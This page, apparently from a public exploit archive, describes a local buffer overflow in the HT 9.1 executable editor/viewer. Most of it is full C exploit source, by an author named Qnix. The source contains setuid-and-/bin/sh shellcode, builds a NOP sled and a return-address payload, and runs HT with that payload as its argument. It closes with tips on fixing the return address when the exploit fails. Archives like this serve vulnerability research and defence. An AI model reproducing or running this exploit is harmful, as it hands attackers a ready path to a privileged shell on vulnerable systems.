A vulnerability in HT 9.1 allows attackers to supply a malicious file that will cause a buffer overflow to occur when it copies [file name] to [fullfilename] and print it on *htapp::window_create_file_bin using *printf()*. Local exploit.
8891b52c870f8802bc053fec0d2a286c8c027a8964df1839696982bde03f0df4HT is a "file editor/viewer/analyzer for executables. The goal is to combine the low-level functionality of a debugger and the usability of IDEs. We plan to implement all (hex-)editing features and support of the most important file formats". A vulnerability in HT allows attackers to supply a malicious file that will cause a buffer overflow to occur when it copies [filename] to [fullfilename] and print it on *htapp::window_create_file_bin using *printf()*.
Exploit:
/*
* HT 9.1 (local exploit)
* By Qnix <Qnix[at]bsdmail[dot]org>
*
* */
#include <stdio.h>
#include <stdlib.h>
#define SZ 4090
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long sp(void)
{ __asm__("movl %esp, %eax");}
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
msg();
if(argc != 2) {
fprintf(stderr,"Usage : %s <ht filename>\n",argv[0]);
exit(0);
}
fprintf(stdout,"[~] Stack pointer (ESP) : 0x%x\n", esp);
fprintf(stdout,"[~] Offset from ESP : 0x%x\n", offset);
fprintf(stdout,"[~] Desired Return Addr : 0x%x\n\n", ret);
buffer = malloc(SZ);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < SZ; i+=4)
{ *(addr_ptr++) = ret; }
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
buffer[SZ-4] = 0;
execl(argv[1], "ht", buffer, 0);
free(buffer);
return 0;
}
int msg() {
fprintf(stdout,"\n -------------------------------- \n");
fprintf(stdout," HT 9.1 (local exploit)\n");
fprintf(stdout," By Qnix <Qnix[at]bsdmail[dot]org");
fprintf(stdout,"\n -------------------------------- \n\n");
}
/* note;
If you didnt get the correct return address for example
the real return address is 0xbffff698 and when you run
the exploit it fail and you see that the return address is
0x98bffff6 , then fix the code by doing something like this
0x98 0xbf 0xff 0xf6
^_____________^
||
0xf6 0xbf 0xff 0x98
^____^
||
0xbf 0xf6 0xff 0x98
^___^
||
0xbf 0xff 0xf6 0x98
Then ret = 0xbffff698 + 0x00000002; + 0x2 added because when you get a problem like that 0xbf will changed to 0xbd so we added 0x2 to fix it . */
--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed